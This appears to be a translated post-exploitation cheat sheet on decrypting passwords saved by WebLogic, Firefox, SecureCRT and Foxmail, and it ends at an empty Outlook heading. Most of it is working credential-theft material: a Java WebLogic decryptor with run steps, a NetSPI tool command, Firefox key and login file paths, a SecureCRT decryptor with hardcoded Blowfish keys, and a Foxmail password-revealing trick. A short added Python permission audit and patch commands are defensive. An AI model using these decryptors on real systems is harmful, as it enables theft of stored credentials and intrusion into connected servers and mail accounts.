Decrypting Passwords Stored by Common Software

Weblogic

  1. Login password
  2. Database configuration file (Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml)

    import weblogic.security.internal.*;
    import weblogic.security.internal.encryption.*;

    /**
     * Password file: Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties
     * Key file:      Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat
     */
    public class WebLogicDecryptor {
        private static ClearOrEncryptedService ces;

        public static void main(String[] args) throws Exception {
            // Both arguments are required: args[0] = domain directory, args[1] = encrypted string
            if (args.length < 2) {
                throw new Exception("must set [domainDir] [encryptStr]");
            }
            ces = new ClearOrEncryptedService(
                    SerializedSystemIni.getEncryptionService(args[0])); // your_domain
            System.out.println("Decrypted: " + ces.decrypt(args[1])); // {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8= 12id9*@YNs0_q2dxwe
        }
    }

  1. Set the environment variables
    base_domain\bin\setDomainEnv.cmd
  2. Compile
    javac WebLogicDecryptor.java
  3. Run
    java WebLogicDecryptor D:\Server\Oracle\Middleware\user_projects\domains\base_domain {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8=

https://github.com/NetSPI/WebLogicPasswordDecryptor

    javac -classpath bcprov-jdk15on-1.58.jar WebLogicPasswordDecryptor.java
    java -Djava.ext.dirs=. WebLogicPasswordDecryptor "./SerializedSystemIni.dat" "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="
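
Both decryptors above need the same two things from a domain: the key file SerializedSystemIni.dat and a file that carries an {AES} value. The following Python audit is an added example, not code from the original page or the linked projects: it walks a domain directory, counts encrypted values per file without printing them, and flags files that accounts other than the owner can access. The sample tree, its contents and the name sample-jdbc.xml are constructed, and the permission check assumes a POSIX host.

```python
import os
import re
import stat
import tempfile

# Encrypted WebLogic values carry an algorithm prefix: {AES}, or {3DES} on older releases.
ENC_RE = re.compile(r"\{(?:AES|3DES)\}[A-Za-z0-9+/=]+")
KEY_NAME = "SerializedSystemIni.dat"


def is_loose(path):
    """True if group or others hold any permission bit (POSIX mode bits)."""
    return bool(stat.S_IMODE(os.stat(path).st_mode) & (stat.S_IRWXG | stat.S_IRWXO))


def audit_domain(domain_dir):
    """Return sorted (file, kind, encrypted_value_count, loose) rows for a domain."""
    findings = []
    for root, _dirs, files in os.walk(domain_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, domain_dir).replace(os.sep, "/")
            if name == KEY_NAME:
                findings.append((rel, "key", 0, is_loose(path)))
            elif name.endswith((".properties", ".xml")):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    count = len(ENC_RE.findall(fh.read()))
                if count:
                    findings.append((rel, "ciphertext", count, is_loose(path)))
    return sorted(findings)


def build_sample_domain():
    """Constructed domain tree using the paths from this page; all values are made up."""
    root = tempfile.mkdtemp()
    fake = "{AES}Q09OU1RSVUNURUQ="  # constructed placeholder, not a real ciphertext
    files = {
        "security/" + KEY_NAME: ("constructed key material", 0o600),
        "servers/AdminServer/security/boot.properties":
            ("username=%s\npassword=%s\n" % (fake, fake), 0o644),
        "config/jdbc/sample-jdbc.xml":
            ("<password-encrypted>%s</password-encrypted>\n" % fake, 0o600),
    }
    for rel, (body, mode) in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return root
```

Run `audit_domain(path)` against a domain directory; every row whose last field is True is a key or ciphertext file whose mode should be tightened to owner-only.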

Patch installation

    ./bsu.cmd -prod_dir=c:\Oracle\Middleware\wlserver_10.3 -status=applied -verbose -view
    ./bsu.sh -view -status=downloaded -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir
    ./bsu.sh -install -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patchlist=GFWX -verbose

Firefox

Path to nss3.dll
C:\Program Files (x86)\Mozilla Firefox\nss3.dll

Firefox profile directory
C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zvu7t3k2.default
cert8.db
key3.db
logins.json

ff_decrypt.py profilesfolder

SecureCRT

https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py

    # Python 2 (uses str.decode('hex') and the print statement)
    from Crypto.Cipher import Blowfish

    def decrypt(password):
        # Two fixed Blowfish keys, CBC mode with an all-zero IV
        c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
        c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
        # Outer layer with c2, drop 4 bytes at each end, then inner layer with c1
        padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
        p = ''
        # Collect two-byte UTF-16 units up to the null terminator
        while padded[:2] != '\x00\x00':
            p += padded[:2]
            padded = padded[2:]
        return p.decode('UTF-16')

    print decrypt("xxx240f919a7a477198d1f6ce3a1fbf5a3671c82483f34bed1304c7ebe8de345")

Foxmail

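Versions below 7.0: Foxmail\Storage\test@domain.com\Accounts\Account.stg
Versions above 7.0: Account.cfg

  1. Account.stg files can be cracked with a tool.
  2. For the Account.cfg format, copy the Account directory into the Storage directory of a Foxmail installation of the same version, edit the FMStorage.list file to add the new mailbox Storage\test@domain.com\, then start the client and view the password with an asterisk password viewer.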

Outlook